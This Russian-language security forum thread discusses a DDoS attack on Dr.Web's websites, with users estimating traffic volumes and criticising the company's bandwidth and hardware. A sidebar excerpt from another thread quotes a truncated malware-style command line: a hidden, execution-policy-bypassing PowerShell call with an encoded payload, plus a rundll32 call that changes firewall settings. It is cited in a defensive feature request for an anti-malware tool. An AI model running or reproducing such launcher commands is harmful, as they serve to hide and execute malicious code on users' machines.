Перейти к содержанию
Alex_Goodwin

Ddos Сайтов drweb

Автор Alex_Goodwin, в Общий форум по информационной безопасности

Recommended Posts

Lemmit    31

Lemmit
Опубликовано

Действительно. DrWeb.com : Internet Explorer не может отобразить эту веб-страницу :cry:

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

Dr.Golova    55

Dr.Golova
Опубликовано

> статистика все еще обрабатывается. входящий трафик составлял 300G/сутки.

Средний домашний adsl в 4 мегабита за $30 в месяц (москва/питер) реально позволяет выкачивать больше 35G/сутки. Если все полегло, значит канал был занят почти полностью. Несложно посчитать что или у лаборатории Данилова канал меньше 50 мегабит (притом что сейчас у многих дома оптоволокно в 100м/б), или они сильно приуменьшили масштабы атаки. Другое дело что при промышленно широком (гигабит и выше) канале стоимость этих 300г/сутки будет более чем четырехзначная, что естесно сильно печально, если фильтры неудается поставить до счетчика на уровне провайдера :-

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

aibolit66    0

aibolit66
Опубликовано
> статистика все еще обрабатывается. входящий трафик составлял 300G/сутки.

Средний домашний adsl в 4 мегабита за $30 в месяц (москва/питер) реально позволяет выкачивать больше 35G/сутки. Если все полегло, значит канал был занят почти полностью. Несложно посчитать что или у лаборатории Данилова канал меньше 50 мегабит (притом что сейчас у многих дома оптоволокно в 100м/б), или они сильно приуменьшили масштабы атаки. Другое дело что при промышленно широком (гигабит и выше) канале стоимость этих 300г/сутки будет более чем четырехзначная, что естесно сильно печально, если фильтры неудается поставить до счетчика на уровне провайдера :-

Если верить блогу доктора веба, то 3 млн. пакетов в минуту (50 000 пакетов в секунду) - это довольно слабый ddos. Есть у меня машинки, которые ежесекундно маршрутизируют, не тупо отбрасывают на фарйволле, а именно маршрутизируют по 70-80 тыс. пакетов в секунду. Доктору вебу в питере можно посоветовать нанять специалиста, который закупит нормальное оборудование, каналы в интернет и отладит системы, которые будут это обслуживать. Если этот ddos хоть как-то негативно повлиял на их сервисы - это неправильно. При таких нагрузках машины не должны были ничего почувстсовать.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

Storm    0

Storm
Опубликовано
который закупит нормальное оборудование, каналы в интернет и отладит системы

Кстати, тут вспомнилось одно интересное заявление, что когда Доктор Веб CureIt только вышел, то народ стал его сразу качать. При этом, как говорили сотрудники Доктор Веба (в шутку или серьез) провода буквально дымились.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

aibolit66    0

aibolit66
Опубликовано
Кстати, тут вспомнилось одно интересное заявление, что когда Доктор Веб CureIt только вышел, то народ стал его сразу качать. При этом, как говорили сотрудники Доктор Веба (в шутку или серьез) провода буквально дымились.

Если там хостинг не через dsl с шаговой АТС, то скорее всего шутка :)

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты
Перейти к списку тем Общий форум по информационной безопасности

  • Сообщения

    • PR55.RP55
      Новые функции в Universal Virus Sniffer (uVS)

      От PR55.RP55 · Опубликовано

      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
      uVS - Тестирование

      От SQx · Опубликовано

    • SQx
      uVS - Тестирование

      От SQx · Опубликовано

      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      uVS - Тестирование

      От demkd · Опубликовано

      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      uVS - Тестирование

      От PR55.RP55 · Опубликовано

      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×